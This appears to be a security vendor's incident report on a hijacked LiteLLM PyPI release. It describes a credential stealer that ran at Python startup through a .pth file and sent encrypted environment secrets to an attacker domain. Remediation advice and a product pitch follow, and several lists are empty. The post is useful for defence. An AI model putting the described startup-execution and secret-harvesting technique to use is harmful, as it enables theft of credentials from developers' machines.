BREAKING March 25, 2026 8 min read

The LiteLLM Supply Chain Attack: How a PyPI Hijack Stole API Keys from Thousands of AI Agent Deployments

An attacker hijacked the LiteLLM maintainer's PyPI account and published credential-stealing packages that activated on Python startup. No import required. If you ran pip install litellm in the last 48 hours, your API keys may be compromised.

What Happened

On March 24, 2026, an attacker compromised the PyPI maintainer account for LiteLLM — the widely-used Python library that provides a unified interface to 100+ LLM providers. Two malicious versions were published: v1.82.7 and v1.82.8.

LiteLLM is a core dependency for agent frameworks including CrewAI, DSPy, and countless custom AI agent deployments. Any system that pulled a fresh install or upgrade in the attack window received the compromised package.

The LiteLLM team has engaged Google Mandiant for incident response. The malicious packages have been removed from PyPI. All maintainer accounts have been rotated.

The Payload: What It Stole

The credential stealer was comprehensive. It harvested:

The stolen data was encrypted with AES-256-CBC + RSA-4096 and exfiltrated via HTTPS POST to litellm.cloud — a domain registered just hours before the attack. The encryption made the exfiltration traffic appear benign to network monitors.

The Persistence Mechanism

Version 1.82.8 introduced a particularly dangerous escalation: a .pth file that Python executes automatically on startup.

This means the credential stealer didn't require an explicit import litellm. Any Python process — a Jupyter notebook, a Flask server, a cron job, a different AI agent entirely — would trigger the payload simply by starting Python in an environment where the compromised package was installed.

This is the difference between a malicious library (runs when imported) and a malicious environment (runs when Python starts). The attack surface expanded from "code that uses LiteLLM" to "any Python code running on the same machine."

Why AI Agent Deployments Are Uniquely Vulnerable

This attack hit the AI agent ecosystem harder than a typical PyPI compromise for three structural reasons:

1. AI agents store secrets in environment variables

The standard pattern for configuring AI agents is environment variables: OPENAI_API_KEY, ANTHROPIC_API_KEY, AZURE_OPENAI_KEY. LiteLLM's own documentation instructs users to set API keys this way. The payload was designed to harvest exactly these variables because that's where the money is.

2. Transitive dependencies are invisible

Many teams don't use LiteLLM directly. They use CrewAI, DSPy, or custom frameworks that depend on LiteLLM. A pip install crewai pulls LiteLLM as a transitive dependency. The developer who ran the install may never have seen LiteLLM in their requirements file — but it was there, and it was compromised.

3. Auto-upgrade in CI/CD pipelines

Production deployments that use pip install litellm without version pinning (or with >=1.82.0) automatically pulled the malicious version on their next build. CI/CD pipelines that build fresh environments on every deploy were especially exposed — every build in the attack window installed the compromised package.

The Pattern: This Keeps Happening

LiteLLM is not an isolated incident. It's the latest in an accelerating series of supply chain attacks targeting AI developer tooling:

DateIncidentImpact
Mar 19, 2026Trivy GitHub Action compromised12,000+ CI/CD pipelines, API keys stolen from memory
Mar 21, 2026Cargo CVE-2026-33056Build-time code execution in Rust MCP servers
Mar 24, 2026LiteLLM PyPI hijack (this incident)All environments with compromised package, auto-execute on Python start

Three supply chain attacks on AI developer tools in six days. The attackers aren't targeting the models — they're targeting the scaffolding. Package managers, CI/CD tools, and dependency chains are where the credentials live and where the defenses are weakest.

What to Do Right Now

If you installed LiteLLM in the last 48 hours:

  1. Check your installed version: pip show litellm — if it shows 1.82.7 or 1.82.8, you were affected
  2. Rotate ALL credentials immediately: Every API key, SSH key, cloud credential, and database password on the affected machine should be considered compromised
  3. Check for .pth files: Look in your Python site-packages directory for any unexpected .pth files that weren't there before
  4. Audit your CI/CD pipelines: Check build logs for litellm==1.82.7 or litellm==1.82.8 in any recent deployment
  5. Update to a clean version: pip install litellm==1.82.6 (last known-good version)

If you use LiteLLM as a transitive dependency:

  1. Check your lockfile: Search requirements.txt, poetry.lock, or Pipfile.lock for litellm and verify the version
  2. Pin your dependencies: If you're using litellm>=1.80, change to litellm==1.82.6 (exact version pin)
  3. Audit frameworks that depend on LiteLLM: CrewAI, DSPy, and other agent frameworks may pull it transitively

The Structural Problem: Scanning Happens Too Late

The LiteLLM attack exposes a gap in how AI agent deployments handle dependency security. Most teams' security posture looks like this:

  1. Developer runs pip install
  2. Package installs and (in this case) immediately executes
  3. Sometime later, maybe, someone runs a vulnerability scan

The credential theft happened at step 2. The scan at step 3 is too late — the data is already exfiltrated.

SkillShield's model inverts this: scan the dependency before it's installed, not after. For AI agent skills and MCP servers, SkillShield checks:

A LiteLLM package that reads all environment variables, encrypts them, and POSTs them to a domain registered the same day would trigger multiple CRITICAL findings in a SkillShield scan before installation.

Stop Storing Secrets in Environment Variables

The LiteLLM attack worked because API keys were stored as environment variables — readable by any process in the same environment. This is the default configuration for nearly every AI agent framework.

Better alternatives:

If the LiteLLM victim had used a secrets manager with scoped access, the payload would have found empty environment variables instead of production credentials.

Key Takeaways


Sources: LiteLLM GitHub Issue #24518 (primary technical timeline), Hacker News discussion (703 points, 435 comments), Google Mandiant engagement confirmed by LiteLLM team.

Scan Your AI Agent Dependencies Before They Execute

LiteLLM proves why post-install scanning is too late. Check your skills and MCP servers before installation — free, instant.

Scan Your Dependencies Now